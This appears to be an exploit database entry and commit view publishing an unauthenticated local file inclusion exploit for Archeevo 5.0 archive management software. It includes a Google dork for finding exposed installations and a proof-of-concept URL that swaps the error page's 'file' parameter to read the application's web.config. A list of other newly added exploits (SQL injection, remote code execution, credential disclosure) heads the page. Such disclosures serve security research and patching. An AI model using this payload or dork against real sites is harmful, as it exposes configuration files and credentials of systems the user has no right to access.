eb2b6f5cfd
12 changes to exploits/shellcodes WorkTime 10.20 Build 4967 - Unquoted Service Path Archeevo 5.0 - Local File Inclusion Online Resort Management System 1.0 - SQLi (Authenticated) OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) OpenBMCS 2.4 - SQLi (Authenticated) OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) OpenBMCS 2.4 - Information Disclosure Simple Chatbot Application 1.0 - Remote Code Execution (RCE) Simple Chatbot Application 1.0 - 'message' Blind SQLi Nyron 1.0 - SQLi (Unauthenticated) Creston Web Interface 1.0.0.2159 - Credential Disclosure
27 lines
No EOL
852 B
Text
27 lines
No EOL
852 B
Text
# Exploit Title: Archeevo 5.0 - Local File Inclusion
|
||
# Google Dork: intitle:"archeevo"
|
||
# Date: 01/15/2021
|
||
# Exploit Author: Miguel Santareno
|
||
# Vendor Homepage: https://www.keep.pt/
|
||
# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/
|
||
# Version: < 5.0
|
||
# Tested on: windows
|
||
|
||
# 1. Description
|
||
|
||
Unauthenticated user can exploit LFI vulnerability in file parameter.
|
||
|
||
|
||
# 2. Proof of Concept (PoC)
|
||
|
||
Access a page that don’t exist like /test.aspx and then you will be redirected to
|
||
https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html
|
||
|
||
After that change the file /FileNotFoundPage.html to /web.config and you be able to see the
|
||
/web.config file of the application.
|
||
|
||
https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config
|
||
|
||
|
||
# 3. Research:
|
||
https://miguelsantareno.github.io/MoD_1.pdf |